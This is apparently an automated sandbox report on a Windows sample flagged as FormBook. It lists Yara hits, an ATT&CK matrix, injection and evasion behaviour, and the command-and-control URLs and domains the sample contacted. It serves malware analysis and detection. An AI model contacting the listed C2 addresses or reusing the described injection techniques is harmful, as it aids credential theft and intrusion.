            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.3cGH9Bakuq.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.3cGH9Bakuq.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.3828370.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.37fc950.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.3cGH9Bakuq.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.3cGH9Bakuq.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.3828370.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.3cGH9Bakuq.exe.37fc950.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1Input Capture1Security Software Discovery221Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 491574 Sample: 3cGH9Bakuq Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 40 Malicious sample detected (through community Yara rule) 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected AntiVM3 2->44 46 4 other signatures 2->46 10 3cGH9Bakuq.exe 3 2->10         started        process3 file4 32 C:\Users\user\AppData\...\3cGH9Bakuq.exe.log, ASCII 10->32 dropped 58 Tries to detect virtualization through RDTSC time measurements 10->58 60 Injects a PE file into a foreign processes 10->60 14 3cGH9Bakuq.exe 10->14         started        17 3cGH9Bakuq.exe 10->17         started        signatures5 process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 14->62 64 Maps a DLL or memory area into another process 14->64 66 Sample uses process hollowing technique 14->66 68 Queues an APC in another process (thread injection) 14->68 19 explorer.exe 14->19 injected process8 dnsIp9 34 www.rangerbuddys.com 103.11.189.189, 49807, 80 VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG Singapore 19->34 36 www.vetpipes.com 104.143.9.211, 49804, 80 VIVIDHOSTINGUS United States 19->36 38 5 other IPs or domains 19->38 48 System process connects to network (likely due to code injection or exploit) 19->48 23 colorcpl.exe 19->23         started        26 autofmt.exe 19->26         started        signatures10 process11 signatures12 50 Self deletion via cmd delete 23->50 52 Modifies the context of a thread in another process (thread injection) 23->52 54 Maps a DLL or memory area into another process 23->54 56 Tries to detect virtualization through RDTSC time measurements 23->56 28 cmd.exe 1 23->28         started        process13 process14 30 conhost.exe 28->30         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            3cGH9Bakuq.exe26%VirustotalBrowse
            3cGH9Bakuq.exe22%ReversingLabsWin32.Trojan.Pwsx

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            6.2.3cGH9Bakuq.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.zhongyicts.com.cnA.0%Avira URL Cloudsafe
            http://www.vetpipes.com/scb0/?IN9dgxBh=gxg+zqdn+o0ww4uf8TcZaQyTsJgiXCW12nXRXcs11V7/zKzoeUyv6HeZPjVpo2wMT0Al&sVSH=CPDL8v10%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.omniriot.com/scb0/?sVSH=CPDL8v1&IN9dgxBh=beKAYpkJja+K0I/DndBFcQmb1njbIlQSoH3Y/zfbdScl712FMHF3+aANQrs36cfLB01F0%Avira URL Cloudsafe
            http://www.rangerbuddys.com/scb0/?sVSH=CPDL8v1&IN9dgxBh=J7r5qQFPY3cJvABn1Gs7ze2qtK7SOzbffr49jA2eoV1JiGZLpH7+KoOsOPA+gXWondlu0%Avira URL Cloudsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.founder.com.cn/cnenx0%Avira URL Cloudsafe
            http://www.fontbureau.comoW0%Avira URL Cloudsafe
            http://www.founder.com.cn/cnorm0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cnA.0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.fontbureau.comdiafN0%Avira URL Cloudsafe
            http://www.founder.com.cn/cnh-c0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cnenx0%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.founder.com.cn/cned0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/0%URL Reputationsafe
            http://www.carterandcone.comh0%URL Reputationsafe
            http://www.zhongyicts.com.cnh0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.fontbureau.comt0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.rangerbuddys.com
            		103.11.189.189
            		truefalse
              		high
              www.omniriot.com
              		154.208.82.163
              		truefalse
                		high
                marmorariapiramide.online
                		143.198.15.243
                		truefalse
                  		high
                  www.vetpipes.com
                  		104.143.9.211
                  		truefalse
                    		high
                    www.marmorariapiramide.online
                    		unknown
                    		unknownfalse
                      		high
                      www.emptycc.net
                      		unknown
                      		unknownfalse
                        		high
                        www.traexcel.com
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.vetpipes.com/scb0/?IN9dgxBh=gxg+zqdn+o0ww4uf8TcZaQyTsJgiXCW12nXRXcs11V7/zKzoeUyv6HeZPjVpo2wMT0Al&sVSH=CPDL8v1true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.omniriot.com/scb0/?sVSH=CPDL8v1&IN9dgxBh=beKAYpkJja+K0I/DndBFcQmb1njbIlQSoH3Y/zfbdScl712FMHF3+aANQrs36cfLB01Ftrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.rangerbuddys.com/scb0/?sVSH=CPDL8v1&IN9dgxBh=J7r5qQFPY3cJvABn1Gs7ze2qtK7SOzbffr49jA2eoV1JiGZLpH7+KoOsOPA+gXWondlutrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.vodien.com/colorcpl.exe, 0000000F.00000002.930259419.0000000005572000.00000004.00020000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designersG3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers/?3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/bThe3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cnA.3cGH9Bakuq.exe, 00000000.00000003.667627044.0000000005686000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://kr.battle.net/heroes/ko/?https://twitter.com/Dalsae_info9https://twitter.com/hanalen_3cGH9Bakuq.exefalse
                                  		high
                                  https://api.twitter.com/1.1/friendships/no_retweets/ids.json3cGH9Bakuq.exefalse
                                    		high
                                    https://pbs.twimg.com/media/3cGH9Bakuq.exefalse
                                      		high
                                      http://kr.battle.net/heroes/ko/3cGH9Bakuq.exefalse
                                        		high
                                        http://www.fontbureau.com/designers?3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.vodien.com/singapore-email-hosting.phpcolorcpl.exe, 0000000F.00000002.930259419.0000000005572000.00000004.00020000.sdmpfalse
                                            		high
                                            https://api.twitter.com/1.1/friendships/update.json3cGH9Bakuq.exefalse
                                              		high
                                              http://www.tiro.com3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://api.twitter.com/1.1/blocks/create.json3cGH9Bakuq.exefalse
                                                		high
                                                https://api.twitter.com/1.1/blocks/ids.json3cGH9Bakuq.exefalse
                                                  		high
                                                  http://www.fontbureau.com/designers3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://api.twitter.com/1.1/statuses/unretweet/3cGH9Bakuq.exefalse
                                                      		high
                                                      http://www.goodfont.co.kr3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.carterandcone.com3cGH9Bakuq.exe, 00000000.00000003.669096429.0000000005685000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://api.twitter.com/1.1/statuses/user_timeline.json3cGH9Bakuq.exefalse
                                                        		high
                                                        https://upload.twitter.com/1.1/media/upload.json3cGH9Bakuq.exefalse
                                                          		high
                                                          http://www.founder.com.cn/cnenx3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.fontbureau.comoW3cGH9Bakuq.exe, 00000000.00000002.686643598.0000000000E77000.00000004.00000040.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://api.twitter.com/1.1/statuses/unretweet/whttps://api.twitter.com/1.1/statuses/mentions_timeli3cGH9Bakuq.exefalse
                                                            		high
                                                            http://www.founder.com.cn/cnorm3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.sajatypeworks.com3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.typography.netD3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.founder.com.cn/cn/cThe3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.founder.com.cn/cnA.3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://api.twitter.com/1.1/account/verify_credentials.json3cGH9Bakuq.exefalse
                                                              		high
                                                              http://www.galapagosdesign.com/staff/dennis.htm3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://fontfabrik.com3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://api.twitter.com/oauth/access_token3cGH9Bakuq.exefalse
                                                                		high
                                                                http://www.fontbureau.comdiafN3cGH9Bakuq.exe, 00000000.00000002.686643598.0000000000E77000.00000004.00000040.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.founder.com.cn/cnh-c3cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://api.twitter.com/1.1/favorites/destroy.json3cGH9Bakuq.exefalse
                                                                  		high
                                                                  https://api.twitter.com/1.1/statuses/retweet/3cGH9Bakuq.exefalse
                                                                    		high
                                                                    http://www.galapagosdesign.com/DPlease3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://api.twitter.com/1.1/statuses/destroy/3cGH9Bakuq.exefalse
                                                                      		high
                                                                      https://api.twitter.com/1.1/statuses/home_timeline.json3cGH9Bakuq.exefalse
                                                                        		high
                                                                        http://www.zhongyicts.com.cnenx3cGH9Bakuq.exe, 00000000.00000003.667627044.0000000005686000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.fonts.com3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.sandoll.co.kr3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.urwpp.deDPlease3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.zhongyicts.com.cn3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.sakkal.com3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://api.twitter.com/1.1/friends/list.json3cGH9Bakuq.exefalse
                                                                            		high
                                                                            http://www.founder.com.cn/cned3cGH9Bakuq.exe, 00000000.00000003.667177411.0000000005686000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://api.twitter.com/1.1/direct_messages.jsonyhttps://api.twitter.com/1.1/friendships/no_retweets3cGH9Bakuq.exefalse
                                                                              		high
                                                                              http://www.apache.org/licenses/LICENSE-2.03cGH9Bakuq.exe, 00000000.00000003.667465516.0000000005687000.00000004.00000001.sdmp, 3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.fontbureau.com3cGH9Bakuq.exe, 00000000.00000002.690381391.0000000006892000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.galapagosdesign.com/3cGH9Bakuq.exe, 00000000.00000003.676148683.00000000056B7000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://twitter.com/hanalen_3cGH9Bakuq.exefalse
                                                                                    		high
                                                                                    https://api.twitter.com/1.1/statuses/mentions_timeline.json3cGH9Bakuq.exefalse
                                                                                      		high
                                                                                      https://twitter.com/Dalsae_info3cGH9Bakuq.exefalse
                                                                                        		high
                                                                                        https://userstream.twitter.com/1.1/user.json3cGH9Bakuq.exefalse
                                                                                          		high
